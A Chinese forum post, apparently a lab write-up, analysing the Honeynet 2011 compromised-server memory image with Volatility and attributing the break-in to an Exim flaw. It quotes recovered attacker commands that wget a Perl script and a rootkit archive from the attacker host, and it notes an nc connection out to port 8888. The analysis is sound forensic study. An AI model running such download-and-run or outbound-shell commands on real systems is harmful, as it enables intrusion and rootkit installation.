用户
搜索
  • TA的每日心情

    2020-4-21 17:26
  • 签到天数: 12 天

    连续签到: 1 天

    [LV.3]经常看看I

    安全团队

    Rank: 7Rank: 7Rank: 7

    26

    主题

    181

    帖子

    138

    魔法币
    收听
    0
    粉丝
    44
    注册时间
    2016-8-11

    i春秋认证楚安全团队

    发表于 2020-4-21 22:17:22 21457
    本文原创作者:zjun,未经许可禁止转载!

    题目地址:
    http://www.honeynet.org/challenges/2011_7_compromised_server
    使用工具:
    volatility
    <!--more-->

    查看题目要求

    下载这三个镜像并将victoria-v8.sda1.img挂载到/mnt目录下

    sudo mount -o loop victoria-v8.sda1.img /mnt

    /mnt目录下可以看见

    首先查看系统版本

    cat etc/issue


    var/log目录下查看Linux的版本

    然后制作版本对应的profile,可自己手动制作,也可以使用github上制作好的
    Github项目:https://github.com/volatilityfoundation/profiles

    下载debian5010解压后放在/volatility/plugins/overlays/linux目录下

    python vol.py --info


    现在开始分析镜像文件

    python vol.py -f /home/reder/Desktop/tools/取证/取证镜像/victoria-v8.memdump.img --profile=LinuxDebian5010x86 linux_psaux

    可以看见以下的输出

    我们可以发现一个可疑的nc连接,连接到192.168.56.1端口是8888
    查看网络信息:

    python vol.py -f /home/reder/Desktop/tools/取证/取证镜像/victoria-v8.memdump.img --profile=LinuxDebian5010x86 linux_netstat


    TCP 192.168.56.102:25 192.168.56.101:37202 CLOSE sh/2065
    TCP 192.168.56.102:25 192.168.56.101:37202 CLOSE sh/2065
    有两个已经关闭的连接。

    查看bash记录:

    python vol.py -f /home/reder/Desktop/tools/取证/取证镜像/victoria-v8.memdump.img --profile=LinuxDebian5010x86 linux_bash


    可以发现复制了exim4目录下的所有文件,我们切换至/mnt/var/log/exim4目录下,运行su后进入,查看rejectlog

    cat rejectlog



    日志显示IP 192.168.56.101作为发送邮件的主机,结合上面已经关闭的连接,基本表明192.168.56.101是一个攻击IP

    wget http://192.168.56.1/c.pl -O /tmp/c.pl
    wget http://192.168.56.1/rk.tar -O /tmp/rk.tar

    攻击者下载了c.plrk.tar两个文件到/tmp
    查看一下c.pl

    是一个perl脚本文件,自行审计这个脚本的具体作用。

    查看日志

    auth.log



    可发现攻击者爆破了192.168.56.1ssh密码,但是最终并未成功。

    综上可以基本确定攻击者通过Exim进行攻击的。漏洞编号为CVE-2010-4344

    本帖被以下淘专辑推荐:

    大佬牛皮!!!
    使用道具 举报 回复
    发表于 2020-4-30 15:12:18
    嘤嘤嘤
    使用道具 举报 回复
    发新帖
    您需要登录后才可以回帖 登录 | 立即注册